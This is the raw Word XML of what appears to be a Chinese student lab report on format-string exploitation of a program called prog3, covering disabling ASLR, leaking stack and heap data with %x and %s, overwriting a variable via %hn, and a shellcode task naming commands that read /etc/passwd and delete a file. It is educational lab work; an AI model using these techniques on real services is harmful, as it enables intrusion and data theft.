      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t>l。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E226F82" w14:textId="6EAA08A3" w:rsidR="00D60E78" w:rsidRDefault="00DA22D7" w:rsidP="00D60E78">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以获得root的权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC447E3" w14:textId="39BA806B" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="00D60E78"/>
    <w:p w14:paraId="42DD52C0" w14:textId="696C546C" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="00D60E78">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D60E78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60E78">
        <w:t>3：</w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Hlk76667832"/>
      <w:r w:rsidRPr="00D60E78">
        <w:t>针对prog3，完成以下任</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00D60E78">
        <w:t>务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D3724" w14:textId="0E84C0B8" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="0075109A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>打印</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>上数据；</w:t>
      </w:r>
      <w:r w:rsidR="004E7DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AF064" w14:textId="308505FA" w:rsidR="0075109A" w:rsidRDefault="0062159B" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A430C3A" wp14:editId="301FE51D">
            <wp:extent cx="5274310" cy="4514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0DC2" w14:textId="047303DB" w:rsidR="0075109A" w:rsidRDefault="004E7DB6" w:rsidP="0075109A">
      <w:bookmarkStart w:id="14" w:name="_Hlk76668019"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidR="00B60D10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器操作系统的位数为32位</w:t>
      </w:r>
      <w:r w:rsidR="00B50447">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以在server程序中将</w:t>
      </w:r>
      <w:r w:rsidR="00497978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PROGRAM变量修改为</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00497978">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00497978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidR="00497978">
        <w:t>-32”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p w14:paraId="4B67A3C0" w14:textId="0FF3F5CB" w:rsidR="00134475" w:rsidRDefault="00236804" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D292B77" wp14:editId="5BC1D9BD">
            <wp:extent cx="5274310" cy="17576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4FAD" w14:textId="2BEAFE5E" w:rsidR="00134475" w:rsidRDefault="00CE3ECC" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭地址随机化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED34246" w14:textId="77777777" w:rsidR="00961EF5" w:rsidRPr="00961EF5" w:rsidRDefault="00961EF5" w:rsidP="00961EF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kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00961EF5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961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kernel.randomize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00961EF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D2D25" w14:textId="16A0B790" w:rsidR="00CE3ECC" w:rsidRPr="00961EF5" w:rsidRDefault="006C1FA1" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EAED6A5" wp14:editId="0D5CC418">
            <wp:extent cx="5274310" cy="29432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AFCF" w14:textId="6B33D907" w:rsidR="00571751" w:rsidRDefault="00521436" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s%s%s%s%s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00990542">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后没有打印正确返回 </w:t>
      </w:r>
      <w:r w:rsidR="00990542">
        <w:t xml:space="preserve">(^_^)  </w:t>
      </w:r>
      <w:r w:rsidR="00990542">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r w:rsidR="00720CE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序崩溃了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B54B6D" w14:textId="18BEAAE9" w:rsidR="00521436" w:rsidRDefault="00521436" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E37818" wp14:editId="1C98E773">
            <wp:extent cx="5274310" cy="26314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6643" w14:textId="3CBD572E" w:rsidR="00E97BF3" w:rsidRDefault="002957D4" w:rsidP="0075109A">
      <w:bookmarkStart w:id="15" w:name="_Hlk76668830"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写脚本生成</w:t>
      </w:r>
      <w:r w:rsidR="000E62DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80个%</w:t>
      </w:r>
      <w:r w:rsidR="000E62DE">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00477795">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="000E62DE">
        <w:t>x.</w:t>
      </w:r>
      <w:r w:rsidR="00C345AC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C345AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一共打印</w:t>
      </w:r>
      <w:r w:rsidR="00BD59F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidR="00BD59F9">
        <w:t>%x</w:t>
      </w:r>
      <w:r w:rsidR="00BD59F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即第64个%</w:t>
      </w:r>
      <w:r w:rsidR="00BD59F9">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00364A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
      <w:r w:rsidR="00BD59F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r w:rsidR="008E2B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户输入的字符串</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="437EEB21" w14:textId="5291D7C8" w:rsidR="00FA07CC" w:rsidRDefault="00FA07CC" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400FF80F" wp14:editId="6A28F162">
            <wp:extent cx="5274310" cy="7080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D33F" w14:textId="27403117" w:rsidR="00E97BF3" w:rsidRDefault="008153F8" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A809C2" wp14:editId="0F2E4093">
            <wp:extent cx="5274310" cy="9798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3D43" w14:textId="77777777" w:rsidR="00E97BF3" w:rsidRDefault="00E97BF3" w:rsidP="0075109A"/>
    <w:p w14:paraId="7D596213" w14:textId="4445FA41" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="0075109A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>获得 heap 上的 secret 变量的值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05544290" w14:textId="77777777" w:rsidR="00A141CA" w:rsidRDefault="00633F32" w:rsidP="00A141CA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E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>在实验过程中</w:t>
      </w:r>
      <w:r w:rsidR="00F83D78" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00F83D78" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00F83D78" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>脚本的</w:t>
      </w:r>
      <w:r w:rsidR="00050364" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>运行有错误</w:t>
      </w:r>
      <w:r w:rsidR="0073343D" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>，发现是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0073343D" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>ubantu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0073343D" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="0073343D" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="0073343D" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>版本未匹配</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C71" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>，同时查阅资料发现</w:t>
      </w:r>
      <w:r w:rsidR="00A141CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>Ubuntu16.04</w:t>
      </w:r>
      <w:r w:rsidR="00A141CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>默认安装了</w:t>
      </w:r>
      <w:r w:rsidR="00A141CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>Python2.7</w:t>
      </w:r>
      <w:r w:rsidR="00A141CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00A141CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBA5D7" w14:textId="3CE31BC3" w:rsidR="0075109A" w:rsidRPr="00E2346E" w:rsidRDefault="00DB07E8" w:rsidP="00E2346E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E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>只需要更改两个版本的优先级即可，使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>版本的</w:t>
      </w:r>
      <w:r w:rsidR="00ED4D56" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00ED4D56" w:rsidRPr="00E2346E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>优先级更高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72657449" w14:textId="77777777" w:rsidR="00C127D5" w:rsidRPr="00C127D5" w:rsidRDefault="00C127D5" w:rsidP="00E2346E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 w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>更改默认值，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>Python2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>，现在修改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>Python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B0F41" w14:textId="77777777" w:rsidR="00C127D5" w:rsidRPr="00C127D5" w:rsidRDefault="00C127D5" w:rsidP="00E2346E">
      <w:pPr>
        <w:pStyle w:val="a5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4D4D4D"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t xml:space="preserve"> update-alternatives --install /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>/bin/python python /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>/bin/python2 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4F878" w14:textId="77777777" w:rsidR="00C127D5" w:rsidRPr="00C127D5" w:rsidRDefault="00C127D5" w:rsidP="00E2346E">
      <w:pPr>
        <w:pStyle w:val="a5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4D4D4D"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t xml:space="preserve"> update-alternatives --install /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>/bin/python python /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C127D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>/bin/python3 150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACE19A" w14:textId="77777777" w:rsidR="00C127D5" w:rsidRPr="00E2346E" w:rsidRDefault="00C127D5" w:rsidP="00E2346E">
      <w:pPr>
        <w:pStyle w:val="a5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</w:p>
    <w:p w14:paraId="3AA566E7" w14:textId="17E8EF9C" w:rsidR="0075109A" w:rsidRDefault="00863457" w:rsidP="0075109A">
      <w:bookmarkStart w:id="16" w:name="_Hlk76668903"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用%</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及第一问中计算得到的%</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的个数</w:t>
      </w:r>
      <w:r w:rsidR="008B1E4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写脚本：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="5E3CF4EF" w14:textId="0802B341" w:rsidR="008B1E4B" w:rsidRDefault="001E5C67" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA372FE" wp14:editId="5E5B4C1F">
            <wp:extent cx="5274310" cy="22694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78CC" w14:textId="005098EF" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="0075109A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>修改 target 变量成 0xAABBCCDD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F07C598" w14:textId="08B0D3E4" w:rsidR="00DB1600" w:rsidRDefault="00DB1600" w:rsidP="00DB1600">
      <w:bookmarkStart w:id="17" w:name="_Hlk76669085"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>与prog2一样， 使用%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速修改target变量地址的两个两字节数据</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="02BD7A5E" w14:textId="75EF4F4F" w:rsidR="00FF0CB7" w:rsidRDefault="00C97A27" w:rsidP="00DB1600">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C28853" wp14:editId="08E7C5C5">
            <wp:extent cx="5274310" cy="29768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978D" w14:textId="6781D924" w:rsidR="0075109A" w:rsidRDefault="005E7A64" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B74212D" wp14:editId="2D2D8C35">
            <wp:extent cx="5274310" cy="21355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2377" w14:textId="77777777" w:rsidR="0075109A" w:rsidRDefault="0075109A" w:rsidP="0075109A"/>
    <w:p w14:paraId="516B1ABA" w14:textId="38172ACB" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="0075109A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>通过注入并执行 shellcode 进行利用，执行一个 shell 命令，如：/bin/tail -n 2 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd， /bin/rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67335A2C" w14:textId="12262597" w:rsidR="0075109A" w:rsidRDefault="00A57794" w:rsidP="0075109A">
      <w:bookmarkStart w:id="18" w:name="_Hlk76669344"/>
      <w:bookmarkStart w:id="19" w:name="_Hlk76669387"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该进程的</w:t>
      </w:r>
